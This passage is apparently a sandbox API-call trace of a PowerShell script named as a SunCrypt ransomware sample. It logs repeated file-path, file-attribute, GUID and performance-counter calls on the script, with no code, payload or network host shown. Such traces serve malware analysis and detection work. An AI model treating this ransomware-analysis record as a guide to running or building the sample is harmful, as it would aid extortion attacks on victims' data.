lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.384] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.385] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.385] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.388] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701621218640) returned 1 [0103.396] EtwEventActivityIdControl () returned 0x0 [0103.396] EtwEventActivityIdControl () returned 0x0 [0103.396] EtwEventActivityIdControl () returned 0x0 [0103.396] EtwEventActivityIdControl () returned 0x0 [0103.396] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x2d4de5a1, Data2=0x57cd, Data3=0x42ab, Data4=([0]=0x9d, [1]=0xeb, [2]=0x2, [3]=0xff, [4]=0x3c, [5]=0x7, [6]=0xce, [7]=0x1e))) returned 0x0 [0103.396] CoTaskMemAlloc (cb=0x2d4) returned 0x428fc98 [0103.396] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x428fc98, nSize=0x168 | out: lpBuffer="") returned 0x0 [0103.397] CoTaskMemFree (pv=0x428fc98) [0103.397] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701621335489) returned 1 [0103.397] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.397] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.397] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.397] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: 
lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.397] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.397] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.397] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.406] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701622217052) returned 1 [0103.406] EtwEventActivityIdControl () returned 0x0 [0103.406] EtwEventActivityIdControl () returned 0x0 [0103.406] EtwEventActivityIdControl () returned 0x0 [0103.406] EtwEventActivityIdControl () returned 0x0 [0103.406] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xd86e6ff8, Data2=0x721d, Data3=0x4070, Data4=([0]=0xb6, [1]=0x2b, [2]=0x5e, [3]=0x54, [4]=0x19, [5]=0xc, [6]=0x4b, [7]=0xbe))) returned 0x0 [0103.407] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.407] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701622357328) returned 1 [0103.407] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.407] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.407] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.407] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.408] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.408] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.584] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701640311653) returned 1 [0103.587] EtwEventActivityIdControl () returned 0x0 [0103.587] EtwEventActivityIdControl () returned 0x0 [0103.587] EtwEventActivityIdControl () returned 0x0 [0103.587] EtwEventActivityIdControl () returned 0x0 [0103.587] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xccc3bed5, Data2=0x1915, Data3=0x4d6f, Data4=([0]=0x95, [1]=0x71, [2]=0x72, [3]=0xe1, 
[4]=0x9b, [5]=0x2, [6]=0x7a, [7]=0x74))) returned 0x0 [0103.588] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.588] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701640489245) returned 1 [0103.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.589] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.589] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.589] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.591] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701640724830) returned 1 [0103.591] EtwEventActivityIdControl () returned 0x0 [0103.591] EtwEventActivityIdControl () returned 0x0 [0103.591] EtwEventActivityIdControl () returned 0x0 [0103.591] EtwEventActivityIdControl () returned 0x0 [0103.591] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xe45aac8, Data2=0x78d0, Data3=0x48fa, Data4=([0]=0x8a, [1]=0xb5, [2]=0x36, [3]=0xb9, [4]=0x19, [5]=0x2f, [6]=0xe4, [7]=0x15))) returned 0x0 [0103.592] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.592] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701640887669) returned 1 [0103.592] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.592] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.593] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, 
ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.593] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.593] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.593] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.595] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701641175221) returned 1 [0103.595] EtwEventActivityIdControl () returned 0x0 [0103.595] EtwEventActivityIdControl () returned 0x0 [0103.595] EtwEventActivityIdControl () returned 0x0 [0103.596] EtwEventActivityIdControl () returned 0x0 [0103.596] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x9bb88c9e, Data2=0x899c, Data3=0x4932, Data4=([0]=0xbe, [1]=0xd1, [2]=0x84, [3]=0x57, [4]=0xd7, [5]=0xee, [6]=0x90, [7]=0x2f))) returned 0x0 [0103.597] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.597] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701641347875) returned 1 [0103.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", 
lpFilePart=0x0) returned 0x3a [0103.597] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.597] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.597] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.608] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701642492086) returned 1 [0103.608] EtwEventActivityIdControl () returned 0x0 [0103.608] EtwEventActivityIdControl () returned 0x0 [0103.609] EtwEventActivityIdControl () returned 0x0 [0103.609] EtwEventActivityIdControl () returned 0x0 [0103.609] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xa0b81641, Data2=0x542, Data3=0x4799, Data4=([0]=0xb4, [1]=0xe8, [2]=0xb6, [3]=0x67, [4]=0x86, [5]=0xa1, [6]=0x1c, [7]=0xe2))) returned 0x0 [0103.610] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.610] 
QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701642645388) returned 1 [0103.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.610] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.616] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701643222546) returned 1 [0103.616] 
EtwEventActivityIdControl () returned 0x0 [0103.616] EtwEventActivityIdControl () returned 0x0 [0103.616] EtwEventActivityIdControl () returned 0x0 [0103.616] EtwEventActivityIdControl () returned 0x0 [0103.616] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xdf2b7472, Data2=0xe16f, Data3=0x472f, Data4=([0]=0x8f, [1]=0x1f, [2]=0x1b, [3]=0x7b, [4]=0xa2, [5]=0x22, [6]=0xf, [7]=0xac))) returned 0x0 [0103.617] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.617] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701643374855) returned 1 [0103.617] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.617] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.617] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.618] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.618] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.619] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701643604706) returned 1 [0103.620] EtwEventActivityIdControl () returned 0x0 [0103.620] EtwEventActivityIdControl () returned 0x0 [0103.620] EtwEventActivityIdControl () returned 0x0 [0103.620] EtwEventActivityIdControl () returned 0x0 [0103.620] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x1a276eb6, Data2=0xfd13, Data3=0x4950, Data4=([0]=0x8e, [1]=0x95, [2]=0x2b, [3]=0x0, [4]=0x1b, [5]=0xe1, [6]=0xec, [7]=0x17))) returned 0x0 [0103.621] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.621] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701643765667) returned 1 [0103.621] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.621] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.621] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: 
"c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.622] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.622] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.628] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701644451030) returned 1 [0103.628] EtwEventActivityIdControl () returned 0x0 [0103.628] EtwEventActivityIdControl () returned 0x0 [0103.628] EtwEventActivityIdControl () returned 0x0 [0103.641] EtwEventActivityIdControl () returned 0x0 [0103.641] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x80ab7c62, Data2=0x5049, Data3=0x4d93, Data4=([0]=0xa3, [1]=0xd0, [2]=0xc7, [3]=0x56, [4]=0xe, [5]=0x5a, [6]=0x23, [7]=0x0))) returned 0x0 [0103.642] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.642] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701645871740) returned 1 [0103.642] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", 
